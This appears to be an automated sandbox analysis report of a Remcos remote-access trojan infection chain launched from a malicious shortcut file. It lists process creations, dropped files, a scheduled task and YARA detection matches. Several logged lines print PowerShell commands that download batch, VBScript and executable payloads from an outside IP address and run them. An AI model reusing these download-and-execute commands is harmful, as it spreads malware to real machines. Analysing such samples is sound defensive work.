Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\AUGUST.exe
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: Dlr7HYI6VL.lnk LNK file: /c powershell wget http://172.94.3.25/hello.bat -OutFile %APPDATA%/hello.bat && %APPDATA%/hello.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD0D95 NtdllDefWindowProc_W, 23_2_6FAD0D95
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FACE5F6 NtdllDefWindowProc_W,CallWindowProcW, 23_2_6FACE5F6
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD2932 _memset,NtdllDefWindowProc_W, 23_2_6FAD2932
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\Tasks\lnfast_x64.job
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00404FAA 16_2_00404FAA
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_0041206B 16_2_0041206B
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_0041022D 16_2_0041022D
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00411F91 16_2_00411F91
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA45E70 17_2_6FA45E70
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA463F0 17_2_6FA463F0
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA55FB7 17_2_6FA55FB7
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA63E3B 17_2_6FA63E3B
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA5AE45 17_2_6FA5AE45
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA51D85 17_2_6FA51D85
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA45CA0 17_2_6FA45CA0
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA62CBB 17_2_6FA62CBB
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA56C6C 17_2_6FA56C6C
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA56860 17_2_6FA56860
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA6586C 17_2_6FA6586C
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA417D0 17_2_6FA417D0
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA41730 17_2_6FA41730
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA41739 17_2_6FA41739
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA63743 17_2_6FA63743
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA5648C 17_2_6FA5648C
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA631FF 17_2_6FA631FF
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA5708C 17_2_6FA5708C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C515E70 18_2_6C515E70
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C5163F0 18_2_6C5163F0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C532CBB 18_2_6C532CBB
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C515CA0 18_2_6C515CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C521D85 18_2_6C521D85
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C52AE45 18_2_6C52AE45
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C533E3B 18_2_6C533E3B
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C533743 18_2_6C533743
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C511731 18_2_6C511731
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C511730 18_2_6C511730
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C5117D0 18_2_6C5117D0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C525FB7 18_2_6C525FB7
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C53586C 18_2_6C53586C
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C5331FF 18_2_6C5331FF
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC5E70 23_2_6FAC5E70
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC63F0 23_2_6FAC63F0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD5FB7 23_2_6FAD5FB7
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC17D0 23_2_6FAC17D0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC1730 23_2_6FAC1730
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC1731 23_2_6FAC1731
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAE3743 23_2_6FAE3743
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAE3E3B 23_2_6FAE3E3B
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FADAE45 23_2_6FADAE45
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD1D85 23_2_6FAD1D85
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC5CA0 23_2_6FAC5CA0
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAE2CBB 23_2_6FAE2CBB
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAE31FF 23_2_6FAE31FF
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAE586C 23_2_6FAE586C
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\demhwk 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\gps 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\qapuwvr 7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: String function: 0040243B appears 37 times
Source: C:\Users\user\DZIPR.exe Code function: String function: 6FA553BC appears 48 times
Source: C:\Users\user\DZIPR.exe Code function: String function: 6FA550C9 appears 66 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: String function: 6C5253BC appears 44 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: String function: 6FAD50C9 appears 58 times
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: String function: 6FAD53BC appears 45 times
Source: 24.2.cmd.exe.5862757.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5861b57.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.4e80757.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.DZIPR.exe.362a9ce.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.4e7fb57.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.581ca8a.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.DZIPR.exe.362b5ce.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.explorer.exe.4ee7a8a.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.cmd.exe.4f4a757.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.cmd.exe.4f04a8a.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.cmd.exe.4f49b57.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.explorer.exe.4f2cb57.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.49d1a8a.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 30.2.explorer.exe.4f2d757.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.explorer.exe.4daca8a.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.4a17757.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.4a16b57.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.explorer.exe.4e3aa8a.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.explorer.exe.4df2757.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.explorer.exe.4df1b57.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.DZIPR.exe.35e5901.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
